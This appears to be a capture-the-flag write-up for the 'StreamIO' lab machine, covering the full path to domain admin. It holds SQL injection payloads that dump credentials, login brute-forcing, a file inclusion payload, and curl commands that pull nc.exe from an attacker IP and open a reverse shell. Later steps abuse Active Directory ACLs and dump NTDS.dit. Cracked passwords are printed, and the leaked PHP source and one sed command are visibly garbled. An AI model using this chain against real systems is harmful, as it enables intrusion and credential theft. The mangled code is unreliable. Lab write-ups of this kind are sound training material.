+
+## PORT 389 (LDAP)
+
+Running `enum4linux` to enumerate LDAP
+
+
+
+
+
+It didn't found anything so moving onto smb for checking null authenticatioin
+
+## PORT 139/445 (SMB)
+
+Using `smbclient` to see if we can list shares with null authentication
+
+
+
+## PORT 443 (HTTPS)
+
+### streamIO.htb
+
+
+
+We can see three usernames on `about.php` so they might be helpful for us later
+
+
+
+There's also a login page, so testing for deafult credentials and sqli
+
+
+
+Which neither worked
+
+
+
+We have an option to register for account so let's do that
+
+
+
+But even after registering an account we were not able to login
+
+
+
+Ran `gobuster` to fuzz for files and directories which showed an `admin` directory but it was forbidden to access
+
+
+
+
+
+Running gobuster on `/admin/` showed some interesting files
+
+
+
+Here `master.php` display a message about being accessed through includes so I wasn't sure what it was talking about
+
+
+
+
+### watch.streamio.htb
+
+
+
+Running gobuster on this site showed some php files
+
+
+
+Checking the `search.php` it lets us search for a movie name
+
+
+
+Clicking on any of the movie name to watch it's going to show us a prompt that it isn't available to watch
+
+
+
+This would be retrieving the names of the movie from a database so tried for a sqli with payload
+
+```
+d' or 1=1 --
+```
+
+
+
+Which got blocked, I replaced or with and, and it didn't caught the payload
+
+```
+d' and 1=1 --
+```
+
+
+
+Let's run sqlmap to see if we can dump the database
+
+
+
+ It was able to determine that it was indeed vulnerable
+
+
+
+But it wasn't able to detemine the database reaon could be because of blocked.php filtering the payloads so we need to dump the database manually
+
+For that I tried finding the number of columns but it wasn't returning any error it was hard to identify the columns by including `@@version` in the column and then increasing the column if it wasn't showing in return
+
+```sql
+uwu' union select 1,@@version,3,4,5,6 --
+
+```
+
+
+
+We know that the MSSQL is being used so now we need to enumerate tables for that we can use this payload
+
+```sql
+uwu' union select 1,table_name,3,4,5,6 from information_schema.tables --
+```
+
+
+
+There's a `users` table , we need now need to know what columns exists in this table
+
+```sql
+uwu' union select 1,column_name,3,4,5,6 from information_schema.columns where table_name= 'users' --
+```
+
+
+
+We can then extract username and password columns
+
+```sql
+uwu' union select 1,username,3,4,5,6 from users --
+```
+
+
+
+```sql
+uwu' union select 1,password,3,4,5,6 from users --
+```
+
+
+
+To make it easy, we can concatenate both columns to get a better result
+
+```sql
+uwu' union select 1,concat(username,':',password),3,4,5,6 from users --
+```
+
+
+
+Using `curl` we can make a POST request without sqli payload and then use `sed ` and `awk` to get the usernames and passwords
+
+```bash
+curl -X POST 'https://watch.streamio.htb/search.php' -d 'q=uwu%27%20union%20select%201%2Cconcat%28username%2C%27%3A%27%2Cpassword%29%2C3%2C4%2C5%2C6%20from%20users%20%2D%2D' -k -s | grep h5 | sed -e 's/` with null character , the same with `
` and then removing the tabs before the usernames with `tr -d "\t"` + +
+
+We are now only left with usernames and password hashes which we can seperate using `awk` , `awk -F: '{print $1}'``
+
+
+
+
+
+
+
+
+
+
+
+
+This cracked 12 hashes out of 30, so now let's try to perform bruteforce on login
+
+We can use burpsuite or hydra to perform bruteforce but I found a tool named `patator` which I recently started to like for bruteforcing and fuzzing
+
+```bash
+python3 /opt/patator/patator.py http_fuzz 'url=https://streamio.htb/login.php' method=POST body='username=FILE0&password=FILE1' 0=./users.txt 1=./cracked_passwords.txt -x ignore:fgrep='Login failed'
+```
+
+Here to supply different wordlist we can use any name followed by a number like `0` which indicates the first wordlist so in this case `FILE0` and then we define the path to wordlist in `0` , similar we do this with `FILE1` andd then we can use `-x` to ingore the message in the response using `fgrep` for the string `Login Failed
+
+
+
+This has found the valid login `yoshide : 66boysandgirls..`, After logging in, we can access the admin panel and can see that this user has access to some functionality
+
+
+
+Going through each of the management page, we see a GET parameter
+
+
+
+
+
+So maybe there's a parameter we are not seeing, so fuzzing it through `wfuzz`, for that we'll need to use yoshihide's session as we cannot access admin without being authenticated
+
+```bash
+wfuzz -c -w /opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt -u 'https://streamio.htb/admin/?FUZZ' -b 'PHPSESSID=j20051o8t1rbshc9doco26al06' --hh 1678
+```
+
+
+
+This finds a parameter `debug`, and with this we can perform Local File Inclusion to read the master.php file we found in the /admin directory
+
+
+
+The contents of the page are changed which means that we were able to include master.php file, so now to view the source code, we can use a php base64 filter to encode the contents of the page so that the browser doesn't execute the php code and we can get source code
+
+```php
+https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=master.php
+```
+
+
+
+```php
+yrMovie managment
+"buffered")); +} +$query = "select * from movies order by movie"; +$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered")); +while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC)) +{ +?> + +
+
+
+
+
+
+
+
+
+ +
Staff managment
+"buffered")); +if(isset($_POST['staff_id'])) +{ +?> + Message sent to administrator
+"buffered"));
+while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
+{
+?>
+
+
+
+
+
+
+
+
+
+
+ +
User managment
+"buffered")); +} +$query = "select * from users where is_staff = 0"; +$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered")); +while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC)) +{ +?> + +
+
+
+
+
+
+
+
+
+ +
+
+We have command execution, so let's try getting a shell by downloading `nc` and executing it
+
+```bash
+curl -X POST 'https://streamio.htb/admin/?debug=master.php&cmd=curl+10.10.14.26:2222/nc.exe+-o+C:\Windows\Temp\nc.exe' -k -b 'PHPSESSID=bg2lbvk5d9pvrjub67e5aib3rk' -d 'include=http://10.10.14.26:2222/test.php'
+```
+
+```bash
+curl -X POST 'https://streamio.htb/admin/?debug=master.php&cmd=C:\Windows\Temp\nc.exe+10.10.14.26+3333+-e+cmd.exe' -k -b 'PHPSESSID=bg2lbvk5d9pvrjub67e5aib3rk' -d 'include=http://10.10.14.26:2222/test.php'
+```
+
+
+
+Running `whoami` will return that we are yoshihde user on the system
+
+
+
+
+
+And this user is a normal domain user, checking `C:\Users` there two users `Matrin` and `nikk37` but we don't have access to these directories
+
+
+
+Uploading `sharphound.exe` to gather data about the domain
+
+
+
+To transfer this on to our local machine, we can copy the archive file to `C:\inetpub\streamio.htb` and download the file from the site
+
+
+
+```bash
+https://streamio.htb/20220611010818_BloodHound.zip
+```
+
+Unzip the archive from which we'll get json files and upload them to bloodhound GUI
+
+
+
+Looking through the pre-built quries I didn't find any way to escalate from yoshihide to any user
+
+
+
+ Jdgood seems to be write owner of `Core Staff` group which can read LASPS other than that there was nothing interesting.
+
+We can find credentials for `db_user` from `login.php`
+
+ 
+
+ Also we can find password for `db_admin`
+
+ 
+
+ I tried using `sqlcmd` to login using cmd but it failed
+
+ 
+
+ 
+
+ Later uploaded `chisel` to port forward port 1433
+
+ 
+
+ 
+
+ With `sqsh` we can login to MSSQL and execute quries in the `STREAMIO` database
+
+ 
+
+But we already know that only tables exits in this database, so let's see if there are any other databases
+
+```sql
+SELECT name FROM master.dbo.sysdatabases;
+go
+```
+
+
+
+This shows a database named `streamio_backup`
+
+
+
+But db_user isn't able to access this database, we already have the credentials for db admin so let's use that to access this database
+
+
+
+Listing the tables with
+
+```sql
+SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE'
+```
+
+We can see a users table having 8 users
+
+
+
+
+
+That has nikk37's hash which is a user on the system, checking if crackstation can crack this hash
+
+
+
+Since winrm is open pn the box, we can use `evil-winrm` to login as nikk37
+
+
+
+After getting a shell as nikk37 I ran `winpeas.bat` which showed that there was a firefox profile
+
+
+
+From here we only need `logins.json` and `key4.db`, we can use impacket's smb server to transfer files
+
+
+
+
+
+
+
+
+
+Using `firepwd` a python script to decrypt firefox passwords we can get the passwords from the logins.json and key4.db by having them in the same directory
+
+https://github.com/lclevy/firepwd
+
+
+
+
+
+Brute forcing the passwords we'll get `JDg0dd1s@d0p3cr3@t0r` as the correct password
+
+
+
+Jdgodd isn't in remote desktop user so we can't get a shell or execute commands but we can use the credentials in the process as this user is WriteOwner of `Core Staff` group
+
+First we'll need to create a credential object so that credentials can be used in the process
+
+```powershell
+$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
+
+
+ $Cred = New-Object System.Management.Automation.PSCredential('streamio.htb\JDgodd', $SecPassword)
+
+```
+
+Next use powerview to make the user the owner of the group
+
+```powershell
+
+ Set-DomainObjectOwner -Credential $Cred -Identity "CORE STAFF" -OwnerIdentity "JDgodd"
+ ```
+
+
+
+
+Adding all rights to the group
+
+```powershell
+Add-DomainObjectAcl -TargetIdentity "CORE STAFF" -PrincipalIdentity JDgodd -Rights All -Verbose -Credential $Cred
+```
+
+
+
+Adding Jdogdd to the group as the member
+
+```powershell
+Add-DomainGroupMember -Identity 'CORE STAFF' -Members 'JDgodd' -Credential $cred -Verbose
+```
+
+
+
+Now we can read LAPS password through crackmapexec and can login as the administrator
+
+```bash
+cme ldap streamio.htb -d streamio.htb -u 'JDgodd' -p 'JDg0dd1s@d0p3cr3@t0r' -M laps
+```
+
+
+
+
+
+Being an administrator as he's a domain admin, we can dump NTDS.dit with `secretsdump.py` `from impacket
+
+
+
+
+
+## References
+
+- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md
+- https://stackoverflow.com/questions/9953448/how-to-remove-all-white-spaces-from-a-given-text-file
+- https://github.com/lanjelot/patator
+- https://stackoverflow.com/questions/5477163/how-to-switch-database-context-to-newly-created-database
+- https://stackoverflow.com/questions/147659/get-list-of-databases-from-sql-server
+- https://github.com/jpillora/chisel/releases/tag/v1.7.7
+- https://www.sqlshack.com/working-sql-server-command-line-sqlcmd/
+- https://github.com/lclevy/firepwd
+